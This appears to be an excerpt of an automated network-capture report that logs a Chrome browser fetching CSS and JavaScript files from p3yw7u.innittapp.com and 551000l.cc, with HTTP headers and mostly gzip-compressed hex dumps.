                                          2025-01-12 00:17:23 UTC2780INData Raw: 2e 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 20 34 70 78 0a 7d 0a 0a 2e 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 20 2e 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 2d 74 69 74 6c 65 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 0a 7d 0a 0a 2e 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 20 2e 62 6f 6f 74 73 74 72 61 70 2d 64 69 61 6c 6f 67 2d 6d 65 73 73 61 67 65 20
                                          Data Ascii: .bootstrap-dialog .modal-header { border-top-left-radius: 4px; border-top-right-radius: 4px}.bootstrap-dialog .bootstrap-dialog-title { color: #fff; text-align: center; font-size: 18px}.bootstrap-dialog .bootstrap-dialog-message


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          122192.168.2.449872103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:23 UTC563OUTGET /ftl/commonPage/themes/hb/css/pc.css HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:23 UTC685INHTTP/1.1 200 OK
                                          Content-Type: text/css
                                          Content-Length: 2909
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-03
                                          ETag: "5d848f4f-b5d"
                                          Date: Thu, 26 Dec 2024 22:29:10 GMT
                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                          Expires: Sat, 25 Jan 2025 22:29:10 GMT
                                          Age: 1388892
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Vary: Accept-Encoding
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-212
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-03
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-13
                                          X-Cdn-Request-ID: 503157a5b40fe675f3d5c4458897a0ea
                                          2025-01-12 00:17:23 UTC2909INData Raw: 23 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 39 32 70 78 3b 68 65 69 67 68 74 3a 36 30 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 20 35 30 25 3b 6c 65 66 74 3a 20 35 30 25 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 32 34 36 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 33 30 31 70 78 3b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 7d 0a 2e 69 6e 70 75 74 43 6c 61 73 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 3b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 74 65 78 74 2d 61 6c
                                          Data Ascii: #container{width:492px;height:602px;position: absolute;top: 50%;left: 50%; overflow: hidden;margin-left: -246px;margin-top: -301px;display: block;}.inputClass{font-size: 16px;position: absolute;outline: none;background: rgba(0,0,0,0);border: none;text-al


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          123192.168.2.449873103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:23 UTC582OUTGET /061410/rcenter/common/static/css/gb.validation.min.css HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:23 UTC688INHTTP/1.1 200 OK
                                          Content-Type: text/css
                                          Content-Length: 3788
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"633d510e-2d52"
                                          Date: Fri, 03 Jan 2025 16:38:04 GMT
                                          Last-Modified: Wed, 05 Oct 2022 09:40:30 GMT
                                          Expires: Sun, 02 Feb 2025 16:38:04 GMT
                                          Age: 718757
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-212
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-04
                                          X-Cdn-Request-ID: 806ddaef5c8b4d843084a139b69682b5
                                          2025-01-12 00:17:23 UTC3788INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 5a 5b af e2 58 76 7e ae fa 15 4c 97 a2 ea 2e 0e e5 bb b1 4f a9 95 31 60 c0 5c cd 1d a3 48 23 df 6d b0 bd c1 36 18 18 cd c3 48 23 45 8a f2 12 e5 21 52 f2 32 6f 89 22 45 79 1d 29 4a 7e 4d 7a 66 f2 2f b2 6d cc c1 dc ce a5 d3 a9 64 38 85 8f bd bc f7 da eb b6 d7 fa d6 ae 83 7c fa e1 77 bf fb e3 3f fe e6 bf fe f9 af ff f8 af bf fe c3 6f 7f fd 09 79 ff 79 a3 fb b6 b1 2b a8 40 d3 73 bf 7c ff ce 00 5e 58 08 ec bd fe 98 c3 d1 e5 f6 cb fb 77 a1 be 0d 0b b2 63 9b de 63 4e d5 bd 50 f7 21 51 5d fb 01 f0 1f 73 4b 60 a7 14 57 f6 4d db 2b 28 20 0c 81 fb 98 a3 92 b9 0a f0 35 1d 0e c3 96 db 5c 00 1c 5b cb 7d d0 34 ed cb fb 5f bd 7f ff 59 3d 2d 5c 58 ca 9e ee c4 cb 5b ba 6d 5a e1 23 86 a2 7f 06 a7 03 28 9c e1 80 e8 d1 b2 35 4d f7 0e f3 32 02
                                          Data Ascii: Z[Xv~L.O1`\H#m6H#E!R2o"Ey)J~Mzf/md8|w?oyy+@s|^XwccNP!Q]sK`WM+( 5\[}4_Y=-\X[mZ#(5M2


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          124192.168.2.449876154.193.113.2334435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:24 UTC366OUTGET /message_zh_CN.js?v=1736150851437 HTTP/1.1
                                          Host: 551000l.cc
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:24 UTC17INHTTP/1.1 200 OK
                                          2025-01-12 00:17:24 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                          2025-01-12 00:17:24 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 31 32 20 4a 61 6e 20 32 30 32 35 20 30 30 3a 31 37 3a 32 34 20 47 4d 54 0d 0a
                                          Data Ascii: Date: Sun, 12 Jan 2025 00:17:24 GMT
                                          2025-01-12 00:17:24 UTC52INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                          Data Ascii: Content-Type: application/javascript;charset=UTF-8
                                          2025-01-12 00:17:24 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                          Data Ascii: Vary: Accept-Encoding
                                          2025-01-12 00:17:24 UTC24INData Raw: 43 6f 6e 74 65 6e 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 0d 0a
                                          Data Ascii: Content-Encoding: gzip
                                          2025-01-12 00:17:24 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                          Data Ascii: Access-Control-Allow-Origin: *
                                          2025-01-12 00:17:24 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                          2025-01-12 00:17:24 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 31 33 20 4a 61 6e 20 32 30 32 35 20 30 30 3a 31 37 3a 32 34 20 47 4d 54 0d 0a
                                          Data Ascii: Expires: Mon, 13 Jan 2025 00:17:24 GMT
                                          2025-01-12 00:17:24 UTC30INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 0d 0a
                                          Data Ascii: Cache-Control: max-age=86400
                                          2025-01-12 00:17:24 UTC14INData Raw: 58 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a
                                          Data Ascii: X-Cache: HIT


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          125192.168.2.449878103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:24 UTC605OUTGET /ftl/commonPage/themes/hongbao.css HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://p3yw7u.innittapp.com/ftl/commonPage/themes/gui-base.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:25 UTC688INHTTP/1.1 200 OK
                                          Content-Type: text/css
                                          Content-Length: 5666
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"64252e4f-d530"
                                          Date: Sat, 04 Jan 2025 20:25:07 GMT
                                          Last-Modified: Thu, 30 Mar 2023 06:38:07 GMT
                                          Expires: Mon, 03 Feb 2025 20:25:07 GMT
                                          Age: 618735
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-211
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-04
                                          X-Cdn-Request-ID: 9cdc4b3f3db7fe97924d3e1a1ec07d31
                                          2025-01-12 00:17:25 UTC5666INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5d 7b 8f dc d6 75 ff df 9f 82 85 61 44 16 c4 59 92 b3 b3 4f a4 30 92 d8 a8 5b 20 30 da f4 81 fe b3 e0 ce 70 76 18 71 87 83 19 ae 56 6b 41 40 d2 d8 75 ad 2a 51 9b 36 51 9a c4 68 15 c4 8a 9a c2 8f c2 8e 65 2b 86 fd 65 34 fb f8 16 bd 7c 9f 4b de 7b 79 cf bd 77 bc 56 25 41 da 99 e1 f0 fc ce fb 9c 1f 39 a3 b5 ab af 7d fb e2 e1 cf 2f 1e fc 61 f9 f9 67 67 bf bf bf fc ec cb e5 bf de 39 fd af c7 cb cf ef d9 fb c1 41 38 bd ba f6 5c 6f 18 1f da fe e8 46 30 4f c2 45 70 18 4c 13 fb 78 ee cf 7a 91 7f 72 14 da e4 ef 60 6e dd b2 f6 fd e1 f5 83 79 7c 34 1d d9 c3 38 8a e7 3b d6 f3 e3 f1 d8 fa 93 f0 70 16 cf 13 7f 9a ec 5a b7 a5 4e 05 1f d8 8b 20 39 0e a7 f4 73 c3 28 5e 04 a9 c4 78 3e 4a 1f 16 d2 bc 51 fa 7b d7 6a 3e 66 49 25 ef 1e 85 8b 19
                                          Data Ascii: ]{uaDYO0[ 0pvqVkA@u*Q6Qhe+e4|K{ywV%A9}/agg9A8\oF0OEpLxzr`ny|48;pZN 9s(^x>JQ{j>fI%


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          126192.168.2.449877103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:24 UTC607OUTGET /ftl/commonPage/themes/gui-layer.css HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://p3yw7u.innittapp.com/ftl/commonPage/themes/gui-base.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:25 UTC689INHTTP/1.1 200 OK
                                          Content-Type: text/css
                                          Content-Length: 6923
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-01
                                          ETag: W/"64ddd5e1-c760"
                                          Date: Tue, 24 Dec 2024 05:31:06 GMT
                                          Last-Modified: Thu, 17 Aug 2023 08:10:09 GMT
                                          Expires: Thu, 23 Jan 2025 05:31:06 GMT
                                          Age: 1622778
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-211
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-01
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-13
                                          X-Cdn-Request-ID: 8c7c257540fd3b1fe60272679cf1f404
                                          2025-01-12 00:17:25 UTC6923INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5d 7b 8f 23 c7 71 ff 5f 9f 62 b2 82 e0 3b eb 86 37 1c 92 bb cb 25 64 24 b6 7c 96 1c 2b 09 22 29 7e c1 20 86 64 93 1c 2d 39 43 cd 0c 6f 6f 45 08 f0 de 29 88 6c 39 b1 13 e4 22 cb b0 0d 39 39 c5 71 12 01 c2 39 81 57 51 f2 97 85 7c 8e 35 36 96 60 e9 f2 1d d2 8f e9 99 7e ce 8b 33 7b 7b 11 4f 77 f3 ec aa ae ae ae ae fa 75 75 cf ef 8f e7 4e 10 82 c8 d8 79 f1 85 1b e6 fe ce e0 b1 d6 c2 39 5e bb 26 fc 1b 04 c6 c6 18 fb 0b 3f 38 30 1e ef 74 3a 03 63 ea 7b 91 19 ba af 80 03 a3 dd 5d dd 1a 18 23 67 7c 38 0b fc b5 37 31 e3 07 a3 c0 f1 c2 95 13 00 2f 32 7e cf 5d ae fc 20 72 bc 68 60 bc ca 17 cc 9e 98 a3 c8 83 94 56 ce 64 e2 7a b3 03 c3 32 da bd d5 2d c3 b6 78 0a 90 89 e9 74 0a af f8 c1 04 bd e4 47 91 bf 34 17 60 1a 99 81 33 71 d7 e1 81
                                          Data Ascii: ]{#q_b;7%d$|+")~ d-9CooE)l9"99q9WQ|56`~3{{OwuuNy9^&?80t:c{]#g|871/2~] rh`Vdz2-xtG4`3q


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          127192.168.2.449880103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:24 UTC559OUTGET /ftl/commonPage/js/jquery/jquery-1.11.3.min.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:25 UTC720INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 33545
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-03
                                          ETag: W/"5d848f4f-176d4"
                                          Date: Sun, 29 Dec 2024 00:00:59 GMT
                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                          Expires: Tue, 28 Jan 2025 00:00:59 GMT
                                          Age: 1210585
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-212
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-03
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-10
                                          X-Cdn-Request-ID: ffa72da8ec9699ac92f48bab8e8c84c0
                                          2025-01-12 00:17:25 UTC15664INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dc bd 79 7b e3 c6 b1 2e fe ff f9 14 22 e2 43 03 c3 16 25 8e ed dc 13 70 20 3e b6 c7 8e ed 78 4b 66 1c 3b a1 68 3f d8 48 42 e2 26 92 1a 8d 2c 32 9f fd d6 5b d5 dd 68 2c 1c 3b e7 dc df f2 5c 27 23 62 69 f4 5a 5d 5b d7 72 f1 ac 73 76 f3 d7 fb 7c fb 78 f6 66 d0 1f 0c fa 1f 9c 1d ce fc 34 38 7b 7e 79 f9 91 a2 bf 83 8f cc fb cf d7 f7 ab 2c de 17 eb 95 3a fb 72 95 f6 a9 e0 cd 1d de f4 d7 db d9 c5 a2 48 f3 d5 2e 3f 7b 76 f1 1f 9d e9 fd 2a 45 39 3f 56 49 f0 e4 ad 93 9b 3c dd 7b 51 b4 7f dc e4 eb e9 d9 72 9d dd 2f f2 6e f7 c4 8b 7e fe 76 b3 de ee 77 a3 ea 6d 14 f7 b3 75 7a bf cc 57 fb 51 42 35 77 2e 83 b0 6c 28 78 2a a6 7e a7 2c 12 ec e7 db f5 c3 d9 2a 7f 38 fb 6c bb 5d 6f 7d 4f 8f 62 9b df dd 17 db 7c 77 16 9f 3d 14 ab 8c ca 3c 14 fb
                                          Data Ascii: y{."C%p >xKf;h?HB&,2[h,;\'#biZ][rsv|xf48{~y,:rH.?{v*E9?VI<{Qr/n~vwmuzWQB5w.l(x*~,*8l]o}Ob|w=<
                                          2025-01-12 00:17:25 UTC16384INData Raw: 72 f6 51 e9 90 61 e0 db 8e e8 5d df 79 bd cc ca 8b 3d 68 12 92 9c a8 76 7e bf 92 65 72 b9 96 aa c7 56 19 1f 47 b8 17 e8 0c c1 77 15 ab 78 a1 95 88 7e ed 49 5f 5a e7 43 2a fb 1d cc eb d4 ae 58 de 2f 2a 6e 90 5a 95 27 fb 3d 2f 35 b5 0e 15 82 d1 08 6b 2b 62 55 ec 5e e9 1a 38 a5 43 a5 55 c2 af c7 60 98 8d 6a 62 84 9f 9b ec ca 4d f5 b7 56 7c c0 59 ed 84 b4 94 36 f8 41 e0 4b 57 3f 14 b5 3a db 8c aa 03 04 af dd 52 0a 73 d9 e6 7a c3 46 75 f5 44 dc a5 e7 b7 1c 22 0d 2b be 36 b4 0a 5a 9d 11 4b 26 6a 18 f6 f3 a5 48 61 55 c7 1c 88 fa 01 06 22 43 68 25 2c 00 b8 4a c4 2b 29 3c f2 d9 cf 8f 8f 15 04 28 2b ab 60 62 34 b1 28 aa f9 1c 7e d0 9c df c8 86 82 b4 8f 1c 64 d3 7c 29 b3 55 42 16 58 f6 51 1c 87 89 89 e2 25 6d c2 3d dc 82 11 6f b4 44 87 47 b0 a4 3a 92 21 98 5b 68 fc
                                          Data Ascii: rQa]y=hv~erVGwx~I_ZC*X/*nZ'=/5k+bU^8CU`jbMV|Y6AKW?:RszFuD"+6ZK&jHaU"Ch%,J+)<(+`b4(~d|)UBXQ%m=oDG:![h
                                          2025-01-12 00:17:25 UTC1497INData Raw: 1d fc 3a 24 1c 56 49 32 0c d0 40 a1 6c 03 b6 3a bd 60 32 1b f4 58 f8 11 56 f8 41 42 07 2c 92 20 45 5d 66 05 74 19 f1 c7 a2 ad 79 09 69 17 74 9e 93 c6 6c 15 0d 19 9b 99 35 23 00 d3 d9 85 c4 c3 01 f3 94 c2 f4 79 15 ed 11 8f 15 69 21 dd c4 69 05 c3 4a e3 3e 5f 1d cd 17 eb 23 6c 23 e6 9c 4f 68 0a 76 2a 9c 92 54 18 a8 ec 91 be 82 84 bc 0a 6a 9e 38 65 fb 9d 1a b7 f8 79 97 02 4c 12 f3 f0 c2 c9 2d 1b 93 f5 41 fb 54 86 96 d9 44 bc 9a d8 b9 87 7f fc ba 33 61 4e dd 24 ad 5d 80 17 0b a7 fc 18 81 ac 23 c3 0e f2 7c 42 46 69 1d c1 bc 45 4f 3c 0f f4 c4 5b 8d a0 b4 22 2e 60 3b ab a9 7c 12 75 5c 30 f5 21 c6 e6 10 7a 70 dc 3c b4 61 c5 c6 d9 b0 68 80 55 c4 e0 8e 47 09 07 06 28 36 04 2b 5e 2e f3 09 7f a1 e3 c7 e4 ae f8 2d 15 1a 9f 26 81 66 43 03 a6 0e 46 76 53 2d 27 55 67 08
                                          Data Ascii: :$VI2@l:`2XVAB, E]ftyitl5#yi!iJ>_#l#Ohv*Tj8eyL-ATD3aN$]#|BFiEO<[".`;|u\0!zp<ahUG(6+^.-&fCFvS-'Ug


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          128192.168.2.449879103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:24 UTC540OUTGET /ftl/commonPage/js/float.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:25 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 1929
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"612747ba-1b2f"
                                          Date: Sat, 28 Dec 2024 21:18:01 GMT
                                          Last-Modified: Thu, 26 Aug 2021 07:50:18 GMT
                                          Expires: Mon, 27 Jan 2025 21:18:01 GMT
                                          Age: 1220363
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-13
                                          X-Cdn-Request-ID: c483a3c2d86238d211c1230ddb9b4769
                                          2025-01-12 00:17:25 UTC1929INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 59 5b 6f 13 47 14 7e cf af 18 52 84 77 61 e3 38 54 b4 52 4c 5a ca a5 2a 12 15 55 8b d4 07 84 aa 8d 3d 4e b6 ac 77 a3 dd 75 12 44 23 45 22 a1 81 10 9c 16 28 24 10 c2 25 10 a0 e0 b4 e2 12 93 0b bf c6 b3 b6 ff 45 cf cc ec d5 f6 7a 1d da 48 9d 17 ef ec 9c 39 97 ef 5c e6 cc ba 77 ff fe 2e b4 1f 21 fb 6d 89 cc de 42 42 fd c1 7c ed d9 2b 52 7c 5d 29 5f 45 96 3e d2 df 77 28 25 32 8a 23 78 5c ce 8f a8 18 21 b4 57 e8 fe 44 c9 76 8b c9 af 55 5d b6 04 31 4d 09 8e 8c c8 86 9c 47 fa e0 cf a8 1f 5d 84 ad 3f 28 59 4c b7 4b 83 ba 65 e9 79 36 4d c8 05 4b 4f 48 39 ba ef 7b 65 68 d8 ea 4f fd d2 27 99 74 e9 90 94 51 75 13 f7 9b 58 c5 19 4b 37 26 80 69 6f d7 de 64 4e e3 62 d0 00 ca 15 b4 8c a5 e8 1a 12 40 8a 88 2e 76 81 2e 68 54 36 10 56 61 d5
                                          Data Ascii: Y[oG~Rwa8TRLZ*U=NwuD#E"($%EzH9\w.!mBB|+R|])_E>w(%2#x\!WDvU]1MG]?(YLKey6MKOH9{ehO'tQuXK7&iodNb@.v.hT6Va


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          129192.168.2.449881103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:24 UTC556OUTGET /ftl/commonPage/js/idangerous.swiper.min.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
